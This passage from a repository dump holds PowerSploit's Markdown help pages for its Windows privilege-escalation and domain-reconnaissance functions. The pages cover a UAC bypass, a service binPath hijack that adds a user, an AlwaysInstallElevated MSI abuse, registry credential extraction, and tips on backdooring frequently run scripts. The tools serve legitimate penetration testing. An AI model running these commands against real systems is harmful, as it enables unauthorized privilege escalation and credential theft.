``` 15 | 16 | ## DESCRIPTION 17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if 18 | the current user has rights to change the service configuration. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-ModifiableService 25 | ``` 26 | 27 | Get a set of potentially exploitable services. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.ModifiablePath 36 | 37 | ## NOTES 38 | 39 | ## RELATED LINKS 40 | 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableServiceFile.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableServiceFile 2 | 3 | ## SYNOPSIS 4 | Enumerates all services and returns vulnerable service files. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ModifiableServiceFile 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates all services by querying the WMI win32_service class. 18 | For each service, 19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine 20 | if the current user has rights to modify the service binary itself or any associated 21 | arguments. 22 | If the associated binary (or any configuration files) can be overwritten, 23 | privileges may be escalated. 24 | 25 | ## EXAMPLES 26 | 27 | ### -------------------------- EXAMPLE 1 -------------------------- 28 | ``` 29 | Get-ModifiableServiceFile 30 | ``` 31 | 32 | Get a set of potentially exploitable service binaries/config files. 33 | 34 | ## PARAMETERS 35 | 36 | ## INPUTS 37 | 38 | ## OUTPUTS 39 | 40 | ### PowerUp.ModifiablePath 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-RegistryAlwaysInstallElevated.md: -------------------------------------------------------------------------------- 1 | # Get-RegistryAlwaysInstallElevated 2 | 3 | ## SYNOPSIS 4 | Checks if any of the AlwaysInstallElevated registry keys are set. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-RegistryAlwaysInstallElevated 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys 19 | are set, $False otherwise. 20 | If one of these keys is set, then all .MSI files run with 21 | elevated permissions, regardless of current user permissions. 
22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-RegistryAlwaysInstallElevated 28 | ``` 29 | 30 | Returns $True if any of the AlwaysInstallElevated registry keys are set. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### System.Boolean 39 | 40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise. 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-RegistryAutoLogon.md: -------------------------------------------------------------------------------- 1 | # Get-RegistryAutoLogon 2 | 3 | ## SYNOPSIS 4 | Finds any autologon credentials left in the registry. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-RegistryAutoLogon 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Checks if any autologon accounts/credentials are set in a number of registry locations. 18 | If they are, the credentials are extracted and returned as a custom PSObject. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-RegistryAutoLogon 25 | ``` 26 | 27 | Finds any autologon credentials left in the registry. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.RegistryAutoLogon 36 | 37 | Custom PSObject containing autologin credentials found in the registry. 
38 | 39 | ## NOTES 40 | 41 | ## RELATED LINKS 42 | 43 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ServiceDetail.md: -------------------------------------------------------------------------------- 1 | # Get-ServiceDetail 2 | 3 | ## SYNOPSIS 4 | Returns detailed information about a specified service by querying the 5 | WMI win32_service class for the specified service name. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ServiceDetail [-Name] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Takes an array of one or more service names, or ServiceProcess.ServiceController objects (as returned by Get-Service) on 19 | the pipeline, extracts the service name, queries the 20 | WMI win32_service class for the specified service for details like binPath, and outputs 21 | everything. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-ServiceDetail -Name VulnSVC 28 | ``` 29 | 30 | Gets detailed information about the 'VulnSVC' service. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service VulnSVC | Get-ServiceDetail 35 | ``` 36 | 37 | Gets detailed information about the 'VulnSVC' service. 38 | 39 | ## PARAMETERS 40 | 41 | ### -Name 42 | An array of one or more service names to query information for. 
43 | 44 | ```yaml 45 | Type: String[] 46 | Parameter Sets: (All) 47 | Aliases: ServiceName 48 | 49 | Required: True 50 | Position: 1 51 | Default value: None 52 | Accept pipeline input: True (ByPropertyName, ByValue) 53 | Accept wildcard characters: False 54 | ``` 55 | 56 | ## INPUTS 57 | 58 | ## OUTPUTS 59 | 60 | ### System.Management.ManagementObject 61 | 62 | ## NOTES 63 | 64 | ## RELATED LINKS 65 | 66 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-UnattendedInstallFile.md: -------------------------------------------------------------------------------- 1 | # Get-UnattendedInstallFile 2 | 3 | ## SYNOPSIS 4 | Checks several locations for remaining unattended installation files, 5 | which may have deployment credentials. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-UnattendedInstallFile 15 | ``` 16 | 17 | ## DESCRIPTION 18 | {{Fill in the Description}} 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-UnattendedInstallFile 25 | ``` 26 | 27 | Finds any remaining unattended installation files. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.UnattendedInstallFile 36 | 37 | Custom PSObject containing results. 38 | 39 | ## NOTES 40 | 41 | ## RELATED LINKS 42 | 43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-UnquotedService.md: -------------------------------------------------------------------------------- 1 | # Get-UnquotedService 2 | 3 | ## SYNOPSIS 4 | Get-UnquotedService Returns the name and binary path for services with unquoted paths 5 | that also have a space in the name. 
6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-UnquotedService 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Uses Get-WmiObject to query all win32_service objects and extract out 19 | the binary pathname for each. 20 | Then checks if any binary paths have a space 21 | and aren't quoted. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-UnquotedService 28 | ``` 29 | 30 | Get a set of potentially exploitable services. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.UnquotedService 39 | 40 | ## NOTES 41 | 42 | ## RELATED LINKS 43 | 44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Invoke-PrivescAudit.md: -------------------------------------------------------------------------------- 1 | # Invoke-PrivescAudit 2 | 3 | ## SYNOPSIS 4 | Executes all functions that check for various Windows privilege escalation opportunities. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-PrivescAudit [-HTMLReport] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Executes all functions that check for various Windows privilege escalation opportunities. 18 | 19 | ## EXAMPLES 20 | 21 | ### -------------------------- EXAMPLE 1 -------------------------- 22 | ``` 23 | Invoke-PrivescAudit 24 | ``` 25 | 26 | Runs all escalation checks and outputs a status report for discovered issues. 
27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Invoke-PrivescAudit -HTMLReport 31 | ``` 32 | 33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html 34 | detailing any discovered issues. 35 | 36 | ## PARAMETERS 37 | 38 | ### -HTMLReport 39 | Switch. 40 | Write a HTML version of the report to SYSTEM.username.html. 41 | 42 | ```yaml 43 | Type: SwitchParameter 44 | Parameter Sets: (All) 45 | Aliases: 46 | 47 | Required: False 48 | Position: Named 49 | Default value: False 50 | Accept pipeline input: False 51 | Accept wildcard characters: False 52 | ``` 53 | 54 | ## INPUTS 55 | 56 | ## OUTPUTS 57 | 58 | ### System.String 59 | 60 | ## NOTES 61 | 62 | ## RELATED LINKS 63 | 64 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Invoke-WScriptUACBypass.md: -------------------------------------------------------------------------------- 1 | # Invoke-WScriptUACBypass 2 | 3 | ## SYNOPSIS 4 | Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. 5 | 6 | Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-WScriptUACBypass [-Command] [-WindowStyle ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute 18 | VBScript using the wscript executable with the new manifest. 19 | The VBScript executed by 20 | C:\Windows\wscript.exe will run elevated. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | " 27 | ``` 28 | 29 | Launches the specified PowerShell encoded command in high-integrity. 
30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible' 34 | ``` 35 | 36 | Spawns a high integrity cmd.exe. 37 | 38 | ## PARAMETERS 39 | 40 | ### -Command 41 | The shell command you want wscript.exe to run elevated. 42 | 43 | ```yaml 44 | Type: String 45 | Parameter Sets: (All) 46 | Aliases: CMD 47 | 48 | Required: True 49 | Position: 1 50 | Default value: None 51 | Accept pipeline input: True (ByPropertyName, ByValue) 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ### -WindowStyle 56 | Whether to display or hide the window for the executed '-Command X'. 57 | Accepted values are 'Hidden' and 'Normal'/'Visible. 58 | Default is 'Hidden'. 59 | 60 | ```yaml 61 | Type: String 62 | Parameter Sets: (All) 63 | Aliases: 64 | 65 | Required: False 66 | Position: Named 67 | Default value: Hidden 68 | Accept pipeline input: False 69 | Accept wildcard characters: False 70 | ``` 71 | 72 | ## INPUTS 73 | 74 | ## OUTPUTS 75 | 76 | ## NOTES 77 | 78 | ## RELATED LINKS 79 | 80 | [http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html 81 | https://github.com/Vozzie/uacscript 82 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html 83 | https://github.com/Vozzie/uacscript 84 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1) 85 | 86 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Restore-ServiceBinary.md: -------------------------------------------------------------------------------- 1 | # Restore-ServiceBinary 2 | 3 | ## SYNOPSIS 4 | Restores a service binary backed up by Install-ServiceBinary. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-ServiceDetail, Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Restore-ServiceBinary [-Name] [[-BackupPath] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and 18 | checks for the existence of an "OriginalServiceBinary.exe.bak" in the service 19 | binary location. 20 | If it exists, the backup binary is restored to the original 21 | binary path. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Restore-ServiceBinary -Name VulnSVC 28 | ``` 29 | 30 | Restore the original binary for the service 'VulnSVC'. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service VulnSVC | Restore-ServiceBinary 35 | ``` 36 | 37 | Restore the original binary for the service 'VulnSVC'. 38 | 39 | ### -------------------------- EXAMPLE 3 -------------------------- 40 | ``` 41 | Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' 42 | ``` 43 | 44 | Restore the original binary for the service 'VulnSVC' from a custom location. 45 | 46 | ## PARAMETERS 47 | 48 | ### -Name 49 | The service name to restore a binary for. 50 | 51 | ```yaml 52 | Type: String 53 | Parameter Sets: (All) 54 | Aliases: ServiceName 55 | 56 | Required: True 57 | Position: 1 58 | Default value: None 59 | Accept pipeline input: True (ByPropertyName, ByValue) 60 | Accept wildcard characters: False 61 | ``` 62 | 63 | ### -BackupPath 64 | Optional manual path to the backup binary. 
65 | 66 | ```yaml 67 | Type: String 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: 2 73 | Default value: None 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ## OUTPUTS 81 | 82 | ### PowerUp.ServiceBinary.Installed 83 | 84 | ## NOTES 85 | 86 | ## RELATED LINKS 87 | 88 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Set-ServiceBinaryPath.md: -------------------------------------------------------------------------------- 1 | # Set-ServiceBinaryPath 2 | 3 | ## SYNOPSIS 4 | Sets the binary path for a service to a specified value. 5 | 6 | Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Set-ServiceBinaryPath [-Name] [-Path] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a 18 | service handle to the service with ConfigControl access using the GetServiceHandle 19 | Win32 API call. 20 | ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) 21 | to the string value specified by binPath, and the handle is closed off. 22 | 23 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a 24 | Dacl field to each object. 25 | It does this by opening a handle with ReadControl for the 26 | service with using the GetServiceHandle Win32 API call and then uses 27 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. 28 | 29 | ## EXAMPLES 30 | 31 | ### -------------------------- EXAMPLE 1 -------------------------- 32 | ``` 33 | Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' 34 | ``` 35 | 36 | Sets the binary path for 'VulnSvc' to be a command to add a user. 
37 | 38 | ### -------------------------- EXAMPLE 2 -------------------------- 39 | ``` 40 | Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' 41 | ``` 42 | 43 | Sets the binary path for 'VulnSvc' to be a command to add a user. 44 | 45 | ## PARAMETERS 46 | 47 | ### -Name 48 | An array of one or more service names to set the binary path for. 49 | Required. 50 | 51 | ```yaml 52 | Type: String[] 53 | Parameter Sets: (All) 54 | Aliases: ServiceName 55 | 56 | Required: True 57 | Position: 1 58 | Default value: None 59 | Accept pipeline input: True (ByPropertyName, ByValue) 60 | Accept wildcard characters: False 61 | ``` 62 | 63 | ### -Path 64 | The new binary path (lpBinaryPathName) to set for the specified service. 65 | Required. 66 | 67 | ```yaml 68 | Type: String 69 | Parameter Sets: (All) 70 | Aliases: BinaryPath, binPath 71 | 72 | Required: True 73 | Position: 2 74 | Default value: None 75 | Accept pipeline input: False 76 | Accept wildcard characters: False 77 | ``` 78 | 79 | ## INPUTS 80 | 81 | ## OUTPUTS 82 | 83 | ### System.Boolean 84 | 85 | $True if configuration succeeds, $False otherwise. 86 | 87 | ## NOTES 88 | 89 | ## RELATED LINKS 90 | 91 | [https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx) 92 | 93 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Write-UserAddMSI.md: -------------------------------------------------------------------------------- 1 | # Write-UserAddMSI 2 | 3 | ## SYNOPSIS 4 | Writes out a precompiled MSI installer that prompts for a user/group addition. 5 | This function can be used to abuse Get-RegistryAlwaysInstallElevated. 
6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Write-UserAddMSI [[-Path] ] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Writes out a precompiled MSI installer that prompts for a user/group addition. 19 | This function can be used to abuse Get-RegistryAlwaysInstallElevated. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Write-UserAddMSI 26 | ``` 27 | 28 | Writes the user add MSI to the local directory. 29 | 30 | ## PARAMETERS 31 | 32 | ### -Path 33 | {{Fill Path Description}} 34 | 35 | ```yaml 36 | Type: String 37 | Parameter Sets: (All) 38 | Aliases: ServiceName 39 | 40 | Required: False 41 | Position: 1 42 | Default value: UserAdd.msi 43 | Accept pipeline input: True (ByPropertyName, ByValue) 44 | Accept wildcard characters: False 45 | ``` 46 | 47 | ## INPUTS 48 | 49 | ## OUTPUTS 50 | 51 | ### PowerUp.UserAddMSI 52 | 53 | ## NOTES 54 | 55 | ## RELATED LINKS 56 | 57 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ComputerDetail.md: -------------------------------------------------------------------------------- 1 | # Get-ComputerDetail 2 | 3 | ## SYNOPSIS 4 | This script is used to get useful information from a computer. 5 | 6 | Function: Get-ComputerDetail 7 | Author: Joe Bialek, Twitter: @JosephBialek 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ComputerDetail [-ToString] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | This script is used to get useful information from a computer. 
19 | Currently, the script gets the following information: 20 | -Explicit Credential Logons (Event ID 4648) 21 | -Logon events (Event ID 4624) 22 | -AppLocker logs to find what processes are created 23 | -PowerShell logs to find PowerShell scripts which have been executed 24 | -RDP Client Saved Servers, which indicates what servers the user typically RDP's in to 25 | 26 | ## EXAMPLES 27 | 28 | ### -------------------------- EXAMPLE 1 -------------------------- 29 | ``` 30 | Get-ComputerDetail 31 | ``` 32 | 33 | Gets information about the computer and outputs it as PowerShell objects. 34 | 35 | Get-ComputerDetail -ToString 36 | Gets information about the computer and outputs it as raw text. 37 | 38 | ## PARAMETERS 39 | 40 | ### -ToString 41 | Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. 42 | 43 | ```yaml 44 | Type: SwitchParameter 45 | Parameter Sets: (All) 46 | Aliases: 47 | 48 | Required: False 49 | Position: 1 50 | Default value: False 51 | Accept pipeline input: False 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ## INPUTS 56 | 57 | ## OUTPUTS 58 | 59 | ## NOTES 60 | This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. 61 | You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. 62 | 63 | ## RELATED LINKS 64 | 65 | [Blog: http://clymb3r.wordpress.com/ 66 | Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ 67 | Github repo: https://github.com/clymb3r/PowerShell) 68 | 69 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-Domain.md: -------------------------------------------------------------------------------- 1 | # Get-Domain 2 | 3 | ## SYNOPSIS 4 | Returns the domain object for the current (or specified) domain. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-Domain [[-Domain] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current 18 | domain or the domain specified with -Domain X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-Domain -Domain testlab.local 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-Domain -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -Domain 38 | Specifies the domain name to query for, defaults to the current domain. 39 | 40 | ```yaml 41 | Type: String 42 | Parameter Sets: (All) 43 | Aliases: 44 | 45 | Required: False 46 | Position: 1 47 | Default value: None 48 | Accept pipeline input: True (ByValue) 49 | Accept wildcard characters: False 50 | ``` 51 | 52 | ### -Credential 53 | A \[Management.Automation.PSCredential\] object of alternate credentials 54 | for connection to the target domain. 55 | 56 | ```yaml 57 | Type: PSCredential 58 | Parameter Sets: (All) 59 | Aliases: 60 | 61 | Required: False 62 | Position: Named 63 | Default value: [Management.Automation.PSCredential]::Empty 64 | Accept pipeline input: False 65 | Accept wildcard characters: False 66 | ``` 67 | 68 | ## INPUTS 69 | 70 | ## OUTPUTS 71 | 72 | ### System.DirectoryServices.ActiveDirectory.Domain 73 | 74 | A complex .NET domain object. 
75 | 76 | ## NOTES 77 | 78 | ## RELATED LINKS 79 | 80 | [http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG) 81 | 82 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-DomainSID.md: -------------------------------------------------------------------------------- 1 | # Get-DomainSID 2 | 3 | ## SYNOPSIS 4 | Returns the SID for the current domain or the specified domain. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-DomainComputer 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns the SID for the current domain or the specified domain by executing 18 | Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) 19 | to search for domain controllers through LDAP. 20 | The SID of the returned domain controller 21 | is then extracted. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-DomainSID 28 | ``` 29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-DomainSID -Domain testlab.local 33 | ``` 34 | 35 | ### -------------------------- EXAMPLE 3 -------------------------- 36 | ``` 37 | $SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force 38 | ``` 39 | 40 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 41 | Get-DomainSID -Credential $Cred 42 | 43 | ## PARAMETERS 44 | 45 | ### -Domain 46 | Specifies the domain to use for the query, defaults to the current domain. 47 | 48 | ```yaml 49 | Type: String 50 | Parameter Sets: (All) 51 | Aliases: 52 | 53 | Required: False 54 | Position: 1 55 | Default value: None 56 | Accept pipeline input: False 57 | Accept wildcard characters: False 58 | ``` 59 | 60 | ### -Server 61 | Specifies an Active Directory server (domain controller) to bind to. 62 | 63 | ```yaml 64 | Type: String 65 | Parameter Sets: (All) 66 | Aliases: DomainController 67 | 68 | Required: False 69 | Position: 2 70 | Default value: None 71 | Accept pipeline input: False 72 | Accept wildcard characters: False 73 | ``` 74 | 75 | ### -Credential 76 | A \[Management.Automation.PSCredential\] object of alternate credentials 77 | for connection to the target domain. 78 | 79 | ```yaml 80 | Type: PSCredential 81 | Parameter Sets: (All) 82 | Aliases: 83 | 84 | Required: False 85 | Position: 3 86 | Default value: [Management.Automation.PSCredential]::Empty 87 | Accept pipeline input: False 88 | Accept wildcard characters: False 89 | ``` 90 | 91 | ## INPUTS 92 | 93 | ## OUTPUTS 94 | 95 | ### String 96 | 97 | A string representing the specified domain SID. 98 | 99 | ## NOTES 100 | 101 | ## RELATED LINKS 102 | 103 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-Forest.md: -------------------------------------------------------------------------------- 1 | # Get-Forest 2 | 3 | ## SYNOPSIS 4 | Returns the forest object for the current (or specified) forest. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: ConvertTo-SID 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-Forest [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current 18 | forest or the forest specified with -Forest X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-Forest -Forest external.domain 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-Forest -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -Forest 38 | The forest name to query for, defaults to the current forest. 39 | 40 | ```yaml 41 | Type: String 42 | Parameter Sets: (All) 43 | Aliases: 44 | 45 | Required: False 46 | Position: 1 47 | Default value: None 48 | Accept pipeline input: True (ByValue) 49 | Accept wildcard characters: False 50 | ``` 51 | 52 | ### -Credential 53 | A \[Management.Automation.PSCredential\] object of alternate credentials 54 | for connection to the target forest. 55 | 56 | ```yaml 57 | Type: PSCredential 58 | Parameter Sets: (All) 59 | Aliases: 60 | 61 | Required: False 62 | Position: Named 63 | Default value: [Management.Automation.PSCredential]::Empty 64 | Accept pipeline input: False 65 | Accept wildcard characters: False 66 | ``` 67 | 68 | ## INPUTS 69 | 70 | ## OUTPUTS 71 | 72 | ### System.Management.Automation.PSCustomObject 73 | 74 | Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition 75 | to the forest root domain SID. 
76 | 77 | ## NOTES 78 | 79 | ## RELATED LINKS 80 | 81 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestDomain.md: -------------------------------------------------------------------------------- 1 | # Get-ForestDomain 2 | 3 | ## SYNOPSIS 4 | Return all domains for the current (or specified) forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestDomain [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns all domains for the current forest or the forest specified 18 | by -Forest X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-ForestDomain 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | Get-ForestDomain -Forest external.local 30 | ``` 31 | 32 | ### -------------------------- EXAMPLE 3 -------------------------- 33 | ``` 34 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 35 | ``` 36 | 37 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 38 | Get-ForestDomain -Credential $Cred 39 | 40 | ## PARAMETERS 41 | 42 | ### -Forest 43 | Specifies the forest name to query for domains. 44 | 45 | ```yaml 46 | Type: String 47 | Parameter Sets: (All) 48 | Aliases: 49 | 50 | Required: False 51 | Position: 1 52 | Default value: None 53 | Accept pipeline input: True (ByValue) 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ### -Credential 58 | A 